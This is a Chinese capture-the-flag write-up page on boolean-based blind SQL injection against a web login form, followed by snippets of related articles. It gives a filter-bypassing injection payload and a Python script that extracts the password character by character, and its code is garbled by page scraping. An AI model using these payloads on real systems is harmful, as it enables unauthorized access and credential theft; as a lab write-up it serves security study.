CTF 基於布林的SQL盲注

2021-10-13 00:23:08 字數 2030 閱讀 5623

[ctf學習]基於布林的sql盲注

提  示: 基於布林的sql盲注

描  述: sql注入

訪問題目,又是乙個web login登陸介面,根據提示可以大概猜測是乙個sql post注入題。

123#當username=admin時提示password error

#可知使用者名為 admin

#對username進行注入時,發現<>=都被過濾了,不過or沒有被過濾

#我這邊使用username=a'or(1) or(0)%23 進行sql注入判斷

#將使用者名稱故意輸錯來獲得回顯判斷構造payload

username=admi'or((

ascii

(substr((

select

(password)

)from(1

)))-

48))%

23&password=

123

import requests

import time

url =

""headers =

with requests.session(

)as s:

database =

"passwd:"

s.keep_alive =

false

s.adapters.default_retries =

5for i in

range(1

,32):

for j in

range(48

,128):

sql =

'admi\'or((ascii(substr((select(password))from()))-))--\''

.format

(i,j)

data =

try:

res = s.post(url,data=data,timeout=

5,headers=headers)

except

: time.sleep(2)

res = s.post(url,data=data,timeout=

5,headers=headers)

if'username does not exist'

in res.text:

database +=

chr(j)

print

(database)

break

res.close(

)#得到 passwd:4dcc88f8f1bc05e7c2ad1a60288481a

謝謝**

滲透測試 SQL盲注基於布林的盲注

普通sql注入和sql盲注的區別 sql盲注的思路 基於時間的盲注 通過構造真or假判斷條件的sql語句,且sql語句中根據需要聯合使用sleep 函式一同向伺服器傳送請求,觀察伺服器響應結果是否會執行所設定時間的延遲響應,以此來判斷所構造條件的真or假 若執行sleep延遲,則表示當前設定的判斷條...

bugku基於布林的SQL盲注

解題思路 我用使用者名稱admin,密碼123456,提示密碼錯誤 我用使用者名稱admina,密碼123456,提示使用者名稱錯誤,說明使用者名稱是admin 我的字典sql盲注無法破解密碼,於是我在網上找了乙個大佬寫的pycharm指令碼 記得安裝requests庫和改url import re...

SQL注入 布林盲注

可以進行sql注入,但是不能通過sql注入漏洞看到資料庫中的資訊,但是可以通過真假判斷資料庫中的資訊 布林盲注的方法 構造邏輯判斷語句,判斷資訊的真假,取出所有的真值 以less 8為例 還是老步驟,初步判斷是否存在sql注入漏洞 返回you are in 無返回 可以初步判斷存在sql注入漏洞,並...